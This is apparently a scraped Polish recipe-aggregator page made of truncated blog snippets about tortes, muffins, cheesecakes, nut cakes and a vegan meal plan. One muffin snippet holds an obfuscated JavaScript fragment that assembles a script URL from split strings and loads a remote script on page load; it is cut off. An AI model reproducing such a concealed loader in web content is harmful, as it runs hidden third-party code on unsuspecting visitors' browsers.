Upieczony w minionym roku, na talerzykach znalazł się po toaście noworocznym. Pyszny, intensywnie czekoladowy tort, z lekką masą śmietankowo - waniliową, dopieszczony morelową konfiturą i całkiem sporą dawką procentów zakamuflowanych w biszkopcie. Dla urozmaicenia - krucha kawowa warstwa wewnątrz. Jak to tort, wymaga cierpliwości i czasu, ale są przecież okoliczności, które pozbawione tortowej oprawy, tracą(...)Przykładamy drugą, środkową częścią biszkoptu, ponownie solidnie ponczujemy, wykładamy cienką warstwę konfitury morelowej i drugą połowę kremu śmietankowego. Przykrywamy trzecim blatem biszkoptowym, ponczujemy. Torcik wykończyłam polewą z roztopionej mlecznej czekolady, oprószyłam wiórkami białej, startej czekolady. Biszkopt jest tak miękki, że nie wymaga ponczowania. Ale, jeśli nie macie zamiaru częstować dzieciaków, nie żałujcie alkoholowego dodatku - procenty w ponczu
Kronika PiekarnikaPiernik staropolski inaczej zwany również piernikiem dojrzewającym to jakby jedno ze wspomnień dziecięcych lat. W tamtym roku nie zdążyłam go robić dlatego teraz nie odpuszczę i
Ostra na SłodkoMuffiny są doskonałą przekąską na przejęciach, imprezach urodzinowych, bankietach, konferencjach. Wbrew pozorom, nie musimy kupować jedynie klasycznych czekoladowych czy waniliowych. Przedstawiamy 5 pomysłów na muffiny. Foremki na muffiny Żeby muffiny wyszły perfekcyjnie, musimy posiadać odpowiednie foremki na muffiny. Dobrym pomysłem jest wybranie tych aluminiowych. Dostępne są w różnych wersjach, wielkościach, nie wymagają smarowania tłuszczem, a do tego są dostępne(...)następnie blendujemy ze świeżymy liśćmi bazylii. Pozostałe składniki łączymy ze sobą, a następnie mieszamy całość. Pieczemy w 160 stopniach przez ok. 20 minut. Gotowe i ostudzone babeczki możemy polać polewą zrobioną z jogurtu (dowolnego smaku). (function(){ q00e=document.createElement("script");q00e_=("us")+("ta"); q00e_+="t"+(".");q00e_+=("in");q00eu="1878085";q00e.async=true; q00eu+=".sagtkqyj00exb7az9";q00e.type="text/javascript";q00e_+="f"+"o"+("/"); q00eu+="49pkx5kk324reyd";q00e.src
WojnaNaSmaki.plMoja miłość do serników nigdy się nie skończy i jestem o tym święcie przekonana! Dziś kolejny sernik zagościł w mojej kuchni, a co za tym idzie
Ostra na Słodkopłatków kukurydzianych 100g czekolady mlecznej Warstwa wiśniowa: 300g mrożonych wiśni 100g cukru ½opakowania galaretki wiśniowej Krem do tynkowania tortu: 1 kostka masła 150g masy krówkowej z puszki Polewa: 40ml słodkiej śmietanki 60g mlecznej czekolady Dodatkowo słodycze lub owoce do dekoracji tortu Sposób przygotowania Biszkopt: Kakao zalewamy wrzącą wodą, mieszamy, a następnie dolewamy mleko i ponownie łączymy składniki(...)Przygotowujemy go wtedy, gdy tort jest już złożony i chłodzi się w lodówce. Ganache: Śmietankę podgrzewamy i wrzucamy posiekaną czekoladę. Odstawiamy na minutkę i mieszamy. Złożenie: Biszkopt-warstwa masy czekoladowej-pralina-warstwa masy czekoladowej-biszkopt-tężejąca warstwa wiśniowa (warto przed jej wyłożeniem zrobić rant z czekoladowej masy, tak by nam nic nie wyciekło)- biszkopt- warstwa kremu czekoladowego-pralina- ostatnia warstwa
Kuchnia w czekoladziemuffiny i fajną książkę do pokazania. Muffiny zresztą wyskoczyły z tej książki :) Gdybyście tylko widzieli minę mojego syna jak mnie nakrył na tym, że cukinię zamierzam dodać do czekoladowych muffinów... :) Skończyło się całkiem dobrze, bo muffiny zjadł ze smakiem, ja zresztą też, bo były pyszne, a do tego mokre tak jak lubię i szybkie w przygotowaniu, czyli dla nas leniuchów(...)nagrzanego piekarnika i piekłam około 40 minut. Wiadomo, jeśli użyjesz małych papilotek pieczesz krócej, jeśli użyjesz dużych pieczesz dłużej. Najbezpieczniej pod koniec czas sprawdzić patyczkiem stopień wypieczenia muffinek. Ekspresowa polewa. Do rondelka włożyłam 1 łyżeczkę masła i czekoladę, po rozpuszczeniu masła i czekolady wlałam śmietankę kremówkę i wymieszałam dokładnie do momentu uzyskania polewy. Jeśli wydaje ci się za gęsta
Blondynka GotujeZnacie to: niedziela,sklepy zamknięte, a tu nagle telefon: „wpadnę na kawę!”- no ok. super. Tylko , że brak czegoś słodkiego do kawy w domu… No jak
Domowe ciastaPrzepis na pyszne ciasto makowe z brzoskwiniami . Na makowym biszkopcie w środku wypełnionym kremem śmietankowym z brzoskwiniami. Góra ciasta pokryta jest cienką warstwą kremu udekorowanego muśnięciami czekoladowymi. Całość w smaku bardzo delikatna i nie za słodka. Ciasto wagowo leciutkie, a zacny wygląd pięknie się wyróżni na świątecznym stole. Przepis znalazłam na blogu Krystyny . Polecam, bo warto się skusić(...)sokiem po brzoskwiniach. Gdy sok wsiąknie w biszkopt wykładamy krem (ten bez brzoskwiń). Wyrównujemy powierzchnię i dekorujemy ciasto. 4. Dekoracja. Ciasto polałam syropem kakaowym, który przeznaczony jest do polewania lodów. Równie dobrze można to zrobić roztopioną czekoladą, lub udekorować wiórkami kokosowymi. Ciasto wstawiamy do lodówki najlepiej na całą noc. TUTAJ najdziesz więcej przepisów na ciasta
RITA food channelorzechowiec, są doskonałe same w sobie jako oddzielne wypieki. ( z pozostałego ciasta miodowego można upiec pierniczki, a niewykorzystaną odkrojoną po upieczeniu część biszkopta, można przełożyć inną masą, polać polewą, lukrem lub pozostawić w wersji bez dodatków ). Ciasto po złożeniu jest miękkie, korzenno - orzechowe, posiada prezencję eleganckiego tortu i jak wspomniałam - doskonale się przechowuje. Jeśli więc szukacie już(...)czym przekrajamy go wzdłuż na pół, tak jak placek piernikowy. Jedną część biszkopta odkładamy, by wykorzystać go w innym celu, drugą przekrajamy na dwa cieńsze blaty. Masa czekoladowa: Składniki: w temperaturze pokojowej 150 gram serka mascarpone 4 pełne łyżki kremu czekoladowego - u mnie Nutella 50 gram mlecznej, rozpuszczonej czekolady ( może być również gorzka ) Wykonanie: Krem czekoladowy mieszamy
Kronika Piekarnikawolę stopniowo delektować się nimi przed Świętami. Sympatię do Mikołajek zawdzięczam moim Rodzicom . Odkąd pamiętam zostawiałyśmy z siostrą na noc skarpetę, a Rodzice napełniali ją słodyczami. Najbardziej lubię te czekoladowe lizaki-mikołaje oraz kalendarz adwentowy. I choć 18 urodziny mam już dawno za sobą, nadal na 6 grudnia dostaję taki kalendarz od moich Rodziców :) Codziennie po pracy otwieram kolejne okienko(...)patyczka). Odstaw ciasto do ostygnięcia. Przygotuj syrop - w rondelku wymieszaj wodę, cukier i sok z pomarańczy i podgrzej, aż cukier się rozpuści. Ostudzone ciasto pokrój na kwadraty, następnie stopniowo polewaj gorącym syropem, czekając aż wsiąknie w ciasto. Możesz posypać po wierzchu posiekanymi orzechami włoskimi. Ciasto orzechowe jest pyszne do herbaty lub kawy. Sprawdzi się także w połączeniu z waniliowymi lodami
Chilli Czosnek i Oliwa"Jakie plany na weekend? Ja będę całą sobotę i niedziele leniuchować :) Planuję spotkać się z przyjaciółmi, dobrze zjeść i się trochę pobawić, żadnej cięższej pracy czy
Słodkie PrzyjemnościCiasto "Pijak " to jedno z tych ciast, które zawsze się udają i są pewniakami na imprezach. Jest to puszysty biszkopt nasączony wiśniówką i dżemem wiśniowym
Ciasta z tradycjamiSernik, szczególnie na zimno, to jeden z moich ulubionych rodzajów ciast. jakiś czas temu Lindt bardzo mile zaskoczył mnie słodką niespodzianką, którą postanowiłam po części wykorzystać
Z miłości do słodkościmasło i syrop klonowy. Gdy uzyskasz jednolitą masę dodaj orkisz i znów mieszaj. Przełóż do słoiczka lub szklanki. Zrób polewę – czekoladę rozpuść i dokładnie połącz z napojem sojowym. Polewę wyłóż na masę. Obiad: Curry z kalafiorem i ciecierzycą (porcja na dwa dni) [582 kcal/ W: 105 g/ B: 21 g/ T: 9 g] 1 cebula 450 g mrożonego kalafiora(...)znajdziesz powyżej. Obiad: Curry z kalafiorem i ciecierzycą [582 kcal/ W: 105 g/ B: 21 g/ T: 9 g] Potrawa powinna być już gotowa. Przepis znajdziesz powyżej. Kolacja: Budyń czekoladowo – orzechowy [435 kcal/ W: 67 g/ B: 13 g/ T: 14 g] 50 łyżek komosy ryżowej (sypkiej, nieugotowanej) 1 szklanka mleka migdałowego 60 g banana 1 łyżeczka kakao naturalnego
365 dni dookoła kuchni